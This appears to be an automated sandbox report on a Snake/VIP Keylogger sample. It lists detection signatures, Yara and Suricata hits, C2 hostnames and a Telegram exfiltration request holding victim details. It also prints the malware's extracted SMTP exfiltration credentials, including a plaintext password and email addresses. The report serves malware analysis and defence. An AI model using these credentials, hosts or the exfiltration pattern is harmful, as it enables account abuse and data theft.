
Windows Analysis Report
UFOiZapHGS.exe

Overview

General Information

Sample name: UFOiZapHGS.exe (renamed because original name is a hash value)
Original sample name: 241a8414a8cd502eedff5360d582a8b71e0e96c188299052ff9f75a153f325b6.exe
Analysis ID: 1631806
MD5: f8b14a6306cdad99cde9185c68270e8e
SHA1: 5262f8babdeca9e0653c99432e4c96a4055a8458
SHA256: 241a8414a8cd502eedff5360d582a8b71e0e96c188299052ff9f75a153f325b6
Tags: exe, user-adrian__luca

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Sample uses string decryption to hide its real strings
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • UFOiZapHGS.exe (PID: 6596 cmdline: "C:\Users\user\Desktop\UFOiZapHGS.exe" MD5: F8B14A6306CDAD99CDE9185C68270E8E)
    • UFOiZapHGS.exe (PID: 6812 cmdline: "C:\Users\user\Desktop\UFOiZapHGS.exe" MD5: F8B14A6306CDAD99CDE9185C68270E8E)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keystrokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "backend@artisanfurniture.net", "Password": "6?=Ga5^dwH=F4vzm", "Host": "mail.artisanfurniture.net", "Port": "587"}
{"Exfil Mode": "SMTP", "Username": "backend@artisanfurniture.net", "Password": "6?=Ga5^dwH=F4vzm", "Host": "mail.artisanfurniture.net", "Port": "587", "Version": "4.4"}
Source | Rule | Description | Author | Strings
00000001.00000002.3355826178.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000001.00000002.3355826178.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
00000001.00000002.3355826178.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000001.00000002.3355826178.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x2d862:$a1: get_encryptedPassword
  • 0x2db8b:$a2: get_encryptedUsername
  • 0x2d672:$a3: get_timePasswordChanged
  • 0x2d77b:$a4: get_passwordField
  • 0x2d878:$a5: set_encryptedPassword
  • 0x2ef3b:$a7: get_logins
  • 0x2ee9e:$a10: KeyLoggerEventArgs
  • 0x2eb03:$a11: KeyLoggerEventArgsEventHandler
00000001.00000002.3357879942.0000000002D41000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
Source | Rule | Description | Author | Strings
0.2.UFOiZapHGS.exe.4305e48.4.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0.2.UFOiZapHGS.exe.4305e48.4.unpack | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
0.2.UFOiZapHGS.exe.4305e48.4.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
0.2.UFOiZapHGS.exe.4305e48.4.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x2bc62:$a1: get_encryptedPassword
  • 0x2bf8b:$a2: get_encryptedUsername
  • 0x2ba72:$a3: get_timePasswordChanged
  • 0x2bb7b:$a4: get_passwordField
  • 0x2bc78:$a5: set_encryptedPassword
  • 0x2d33b:$a7: get_logins
  • 0x2d29e:$a10: KeyLoggerEventArgs
  • 0x2cf03:$a11: KeyLoggerEventArgsEventHandler
0.2.UFOiZapHGS.exe.4305e48.4.unpack | MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth
  • 0x39aa0:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x39143:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x393a0:$a4: \Orbitum\User Data\Default\Login Data
  • 0x39d7f:$a5: \Kometa\User Data\Default\Login Data
No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-07T16:11:17.280168+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49683 | 104.21.64.1 | 443 | TCP
2025-03-07T16:11:20.403174+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49685 | 104.21.64.1 | 443 | TCP
2025-03-07T16:11:23.437408+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49687 | 104.21.64.1 | 443 | TCP
2025-03-07T16:11:36.384798+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49695 | 104.21.64.1 | 443 | TCP
2025-03-07T16:11:39.401679+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49697 | 104.21.64.1 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-07T16:11:12.120167+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49681 | 132.226.8.169 | 80 | TCP
2025-03-07T16:11:14.870290+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49681 | 132.226.8.169 | 80 | TCP
2025-03-07T16:11:18.203508+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49684 | 132.226.8.169 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-07T16:11:42.495683+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.7 | 49698 | 149.154.167.220 | 443 | TCP


AV Detection

Source: UFOiZapHGS.exe Avira: detected
Source: 00000000.00000002.910063870.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "backend@artisanfurniture.net", "Password": "6?=Ga5^dwH=F4vzm", "Host": "mail.artisanfurniture.net", "Port": "587"}
Source: 00000000.00000002.910063870.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "backend@artisanfurniture.net", "Password": "6?=Ga5^dwH=F4vzm", "Host": "mail.artisanfurniture.net", "Port": "587", "Version": "4.4"}
Source: UFOiZapHGS.exe VirusTotal: Detection: 76%
Source: UFOiZapHGS.exe ReversingLabs: Detection: 76%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack String decryptor: backend@artisanfurniture.net
Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack String decryptor: 6?=Ga5^dwH=F4vzm
Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack String decryptor: mail.artisanfurniture.net
Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack String decryptor: hoa.nguyen@vegavvn.com
Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack String decryptor: 587
Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack String decryptor:
Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack String decryptor: backend@artisanfurniture.net
Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack String decryptor: 6?=Ga5^dwH=F4vzm
Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack String decryptor: mail.artisanfurniture.net
Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack String decryptor: hoa.nguyen@vegavvn.com
Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack String decryptor: 587
Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack String decryptor:
Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack String decryptor: backend@artisanfurniture.net
Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack String decryptor: 6?=Ga5^dwH=F4vzm
Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack String decryptor: mail.artisanfurniture.net
Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack String decryptor: hoa.nguyen@vegavvn.com
Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack String decryptor: 587
Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack String decryptor:

Location Tracking

Source: unknown DNS query: name: reallyfreegeoip.org
Source: UFOiZapHGS.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49682 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49698 version: TLS 1.2
Source: UFOiZapHGS.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\UFOiZapHGS.exe Code function: 4x nop then jmp 0129F45Dh 1_2_0129F2C0
Source: C:\Users\user\Desktop\UFOiZapHGS.exe Code function: 4x nop then jmp 0129F45Dh 1_2_0129F4AC
Source: C:\Users\user\Desktop\UFOiZapHGS.exe Code function: 4x nop then jmp 0129FC19h 1_2_0129F961

Networking

Source: Network traffic Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49698 -> 149.154.167.220:443
Source: unknown DNS query: name: api.telegram.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:530978%0D%0ADate%20and%20Time:%2008/03/2025%20/%2017:27:12%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20530978%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 104.21.64.1 104.21.64.1
Source: Joe Sandbox View IP Address: 104.21.64.1 104.21.64.1
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49684 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49681 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49685 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49697 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49683 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49695 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49687 -> 104.21.64.1:443
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49682 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:530978%0D%0ADate%20and%20Time:%2008/03/2025%20/%2017:27:12%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20530978%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Fri, 07 Mar 2025 15:11:42 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: UFOiZapHGS.exe, 00000000.00000002.910063870.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3355826178.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: UFOiZapHGS.exe, 00000000.00000002.910063870.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3355826178.0000000000402000.00000040.00000400.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002D41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: UFOiZapHGS.exe, 00000000.00000002.910063870.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3355826178.0000000000402000.00000040.00000400.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002D41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002D41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002D41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: UFOiZapHGS.exe, 00000000.00000002.910063870.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3355826178.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
Source: UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002D41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: UFOiZapHGS.exe, 00000000.00000002.910063870.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3355826178.0000000000402000.00000040.00000400.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002D41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: UFOiZapHGS.exe, 00000001.00000002.3359990842.0000000003E02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org?q=
Source: UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002E26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: UFOiZapHGS.exe, 00000000.00000002.910063870.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3355826178.0000000000402000.00000040.00000400.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002E26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002E26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002E26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:530978%0D%0ADate%20a
Source: UFOiZapHGS.exe, 00000001.00000002.3359990842.0000000003E02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: UFOiZapHGS.exe, 00000001.00000002.3359990842.0000000004058000.00000004.00000800.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3359990842.0000000003E02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: UFOiZapHGS.exe, 00000001.00000002.3359990842.0000000004058000.00000004.00000800.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3359990842.0000000003E02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en0
Source: UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en4
Source: UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002ECC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: UFOiZapHGS.exe, 00000001.00000002.3359990842.0000000003E02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: UFOiZapHGS.exe, 00000001.00000002.3359990842.0000000004058000.00000004.00000800.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3359990842.0000000003E02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: UFOiZapHGS.exe, 00000001.00000002.3359990842.0000000003E02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: UFOiZapHGS.exe, 00000001.00000002.3359990842.0000000003E02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gemini.google.com/app?q=
Source: UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002D8F000.00000004.00000800.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002E26000.00000004.00000800.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002DFE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: UFOiZapHGS.exe, 00000000.00000002.910063870.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3355826178.0000000000402000.00000040.00000400.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002D8F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002DFE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002DB9000.00000004.00000800.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002E26000.00000004.00000800.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002DFE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: UFOiZapHGS.exe, 00000001.00000002.3359990842.0000000004058000.00000004.00000800.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3359990842.0000000003E02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: UFOiZapHGS.exe, 00000001.00000002.3359990842.0000000004058000.00000004.00000800.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3359990842.0000000003E02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002EF4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/0
Source: UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/4
Source: UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002EFE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lB
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49689
Source: unknown Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49687
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49685
Source: unknown Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49683
